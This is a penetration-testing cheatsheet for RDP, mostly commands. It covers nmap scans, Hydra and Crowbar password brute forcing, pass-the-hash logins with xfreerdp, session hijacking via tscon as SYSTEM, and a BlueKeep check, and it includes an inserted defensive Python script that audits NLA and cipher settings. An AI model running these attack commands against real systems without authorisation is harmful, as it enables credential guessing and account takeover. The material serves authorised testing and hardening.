RDP Enumeration Cheatsheet

Default Port: 3389 (TCP)


Detection & Info Gathering

nmap -p 3389 -sV <ip>
nmap -p 3389 --script rdp-enum-encryption <ip>
nmap -p 3389 --script rdp-vuln-ms12-020 <ip>
nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip>

Check NLA (Network Level Auth)

# If NLA is required, the credential prompt appears BEFORE the session (login screen) is shown
nmap -p 3389 --script rdp-enum-encryption <ip>
# Under "Security layer": NLA is enforced only when "Native RDP" reports FAILED
# while "CredSSP (NLA)" reports SUCCESS; "Native RDP: SUCCESS" means NLA is optional

# rdp_check.py (impacket): tests credential validity
python3 rdp_check.py <domain>/<user>:<pass>@<ip>
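A defender-side follow-up to the NLA check above, added here as an example and not part of the cheatsheet: it parses `nmap -oN` output from rdp-enum-encryption and flags hosts that still accept standard RDP security (NLA optional) or 40/56-bit RC4. The scan text in SAMPLE_SCAN is constructed to match nmap's output layout, and the host addresses are placeholders.

```python
# Added audit example (not from the cheatsheet): parse `nmap -oN` output from
# --script rdp-enum-encryption; SAMPLE_SCAN is constructed, not a real host.
import re

SAMPLE_SCAN = """\
Nmap scan report for 10.0.0.5
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     Native RDP: SUCCESS
|   RDP Encryption level: Client Compatible
|_    40-bit RC4: SUCCESS
Nmap scan report for 10.0.0.6
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|_    Native RDP: FAILED
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
RESULT_RE = re.compile(r"^\|[_ ]\s+(.+?):\s+(SUCCESS|FAILED)\s*$")
WEAK_CIPHERS = ("40-bit RC4", "56-bit RC4")

def parse_scan(text):
    """Return {host: {mechanism: 'SUCCESS' | 'FAILED'}} from nmap normal output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {}
            continue
        m = RESULT_RE.match(line)
        if m and current is not None:
            hosts[current][m.group(1)] = m.group(2)
    return hosts

def audit(hosts):
    """Return {host: [finding, ...]}; an empty list means nothing to fix."""
    findings = {}
    for host, results in hosts.items():
        issues = []
        # "Native RDP" is standard RDP security; accepting it means NLA is optional
        if results.get("Native RDP") == "SUCCESS":
            issues.append("NLA not enforced")
        weak = [c for c in WEAK_CIPHERS if results.get(c) == "SUCCESS"]
        if weak:
            issues.append("weak ciphers: " + ", ".join(weak))
        findings[host] = issues
    return findings
```

Feed it a real `nmap -oN scan.txt --script rdp-enum-encryption -p 3389 <range>` file and every host with a non-empty finding list needs "Require NLA" and a stronger encryption level set via Group Policy.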

Password Attacks

# Hydra
hydra -l <user> -P wordlist.txt rdp://<ip>
hydra -L users.txt -P wordlist.txt rdp://<ip>
hydra -l <user> -P wordlist.txt rdp://<ip> -t 4    # Limit threads (RDP is picky)

# Crowbar
crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt
crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt

# Metasploit (rdp_scanner only fingerprints RDP and reports whether NLA is required; it does not guess passwords)
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip>
run

Connecting via Linux

# xfreerdp (recommended)
xfreerdp /u:<user> /p:<pass> /v:<ip>
xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain>
xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp    # Mount local dir
xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore          # Ignore cert errors
xfreerdp /u:<user> /pth:<nthash> /v:<ip>                   # Pass-the-Hash (only works if Restricted Admin mode is enabled on the target)

# rdesktop
rdesktop <ip>
rdesktop -u <user> -p <pass> -d <domain> <ip>

# Remmina (GUI)
remmina -c rdp://<user>@<ip>

Session Hijacking (Post-Exploitation)

# List sessions (on Windows target)
query session
query user

# Hijack disconnected session (as SYSTEM)
tscon <session_id> /dest:<current_session>

Key Vulnerabilities

CVE            Name       Affected Systems             Description
CVE-2019-0708  BlueKeep   Win7, WinXP, Server 2008     Pre-auth RCE via RDP
CVE-2019-1181  DejaBlue   Win8, Win10, Server 2012+    Pre-auth RCE via RDP
CVE-2019-1182  DejaBlue   Win8, Win10, Server 2012+    Pre-auth RCE via RDP
CVE-2012-0002  MS12-020   Multiple                     DoS / potential code execution

BlueKeep Check (Metasploit)

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run

Useful Options

# Custom RDP port
xfreerdp /u:<user> /p:<pass> /v:<ip>:<port>

# Enable clipboard sharing
xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard

# Full screen
xfreerdp /u:<user> /p:<pass> /v:<ip> /f

# Dynamic resolution
xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution